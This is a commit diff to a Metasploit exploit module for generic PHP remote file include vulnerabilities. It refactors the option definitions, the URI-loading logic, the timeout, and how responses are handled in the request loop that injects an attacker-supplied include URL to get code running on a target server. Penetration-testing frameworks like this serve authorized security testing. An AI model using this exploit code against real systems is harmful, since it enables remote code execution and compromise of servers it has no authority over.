php_include: Consistencies

g0tmi1k · g0tmi1k · commit 92c068d9f741 · 2026-03-31T14:46:00.000+01:00
Sorry, not sorry
diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb
@@ -14,14 +14,18 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'PHP Remote File Include Generic Code Execution',
+        'Name' => 'Generic PHP Remote File Include',
         'Description' => %q{
-          This module can be used to exploit any generic PHP file include vulnerability,
-          where the application includes code like the following:
-
-          <?php include($_GET['path']); ?>
+          This module can be used to exploit any generic PHP remote file include
+          vulnerability, where the application includes code like the following:
+          <?php include($_REQUEST['inc']); ?>
         },
-        'Author' => [ 'hdm', 'egypt', 'ethicalhack3r' ],
+        'Author' => [
+          'hdm',
+          'egypt',
+          'ethicalhack3r',
+          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+        ],
         'License' => MSF_LICENSE,
         # 'References' => [ ],
         'Privileged' => false,
@@ -51,16 +55,20 @@ def initialize(info = {})
       )
     )
 
-    register_options([
-      OptString.new('ROOTDIR', [ true, 'The base directory to prepend to the URL to try', '/']),
-      OptString.new('PHPURI', [false, 'The URI to request, with the include parameter changed to !INJECT!']),
-      OptString.new('FORMDATA', [false, 'The POST data to send, with the include parameter changed to !INJECT!']),
-      OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"']),
-      OptPath.new('PHPRFIDB', [
-        false, 'A local file containing a list of URLs to try, with !INJECT! replacing the URL',
-        File.join(Msf::Config.data_directory, 'exploits', 'php', 'rfi-locations.dat')
-      ])
-    ])
+    register_options(
+      [
+        OptString.new('ROOTDIR', [ true, 'The base directory to prepend to PHPURIs', '/' ]),
+        OptString.new('PHPURI', [ false, "The URI to request, with the include()'d parameter changed to !INJECT!", 'test.php?inc=!INJECT!' ]),
+        OptString.new('FORMDATA', [ false, "POST data to send, with the include()'d parameter changed to !INJECT!. Otherwise will be a GET request." ]),
+        OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"' ]),
+        OptPath.new('PHPRFIDB',
+                    [
+                      false,
+                      "A local file containing a list of PHPURIs to try, with the include()'d parameter changed to !INJECT!",
+                      File.join(Msf::Config.data_directory, 'exploits', 'php', 'rfi-locations.dat')
+                    ])
+      ]
+    )
   end
 
   def check
@@ -103,7 +111,7 @@ def datastore_headers
   end
 
   def encoded_url(input)
-    encoded_replacement = Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', "%") # ? append is required and PHPRFIDB cannot be trusted
+    encoded_replacement = Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', '%') # ? append is required and PHPRFIDB cannot be trusted
     input.strip.gsub('!INJECT!', encoded_replacement)
   end
 
@@ -114,8 +122,10 @@ def php_exploit
     uris = []
 
     # PHPURI overrides the PHPRFIDB list
-    unless datastore['PHPURI']
-      vprint_status("Loading PHPURIs from PHPRFIDB")
+    if datastore['PHPURI']
+      uris << encoded_url(normalize_uri(datastore['ROOTDIR'], datastore['PHPURI']))
+    else
+      vprint_status('Loading PHPURIs from PHPRFIDB')
       ::File.open(datastore['PHPRFIDB'], 'rb') do |fd|
         fd.read(fd.stat.size).split(/\n/).each do |line|
           line.strip!
@@ -128,48 +138,51 @@ def php_exploit
       end
       uris.uniq!
       print_status("Loaded #{uris.length} PHPURIs")
-    else
-      uris << encoded_url(normalize_uri(datastore['ROOTDIR'], datastore['PHPURI']))
     end
 
     # Very short timeout because the request may never return if we're
     # sending a socket payload
-    timeout = 0.01
+    timeout = 0
 
     # We can't make this parallel without breaking PHP findsock
     # Findsock payloads cause this loop to run slowly
     uris.each do |uri|
       break if session_created?
 
-      feedback_text = "Sending #{method} request: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}"
+      feedback_text = "Sending #{method} request: http#{ssl ? 's' : ''}://#{Rex::Socket.to_authority(rhost, rport)}#{uri}"
       feedback_text << " -> #{data}" unless method.casecmp?('get')
       vprint_status(feedback_text)
       begin
-        req = {
-          'global'  => true,
-          'uri'     => uri,
-          'method'  => method,
+        response = {
+          'global' => true,
+          'uri' => uri,
+          'method' => method,
           'headers' => datastore_headers.merge(
             'Connection' => 'close'
           )
         }
         unless method.casecmp?('get')
-          req['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
-          req['headers']['Content-Length'] = data.length
-          req['data'] = data
+          response['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
+          response['headers']['Content-Length'] = data.length
+          response['data'] = data
         end
 
-        response = send_request_raw(req, timeout)
-        vprint_error("Server responded with: HTTP #{response.code}") if response and response.code != 200
+        response = send_request_raw(response, timeout)
+        # Due to short timeout, may take longer to get a response/shell/session, so not a big deal if this fails
+        if response.nil?
+          vprint_warning('The request received no response in the allotted time, and is expected, even if the exploit succeeds.')
+        elsif response.code != 200
+          vprint_error("Error with payload request (HTTP #{response.code}, should be 200)")
+        end
       rescue ::Interrupt
-        raise $!
+        raise $ERROR_INFO
       rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
         print_error('The target service unreachable')
         break
       rescue ::OpenSSL::SSL::SSLError
         print_error('The target failed to negotiate SSL, is this really an SSL service?')
         break
-      rescue ::Exception => e
+      rescue => e
         print_error("Exception #{e.class} #{e}")
       end
 
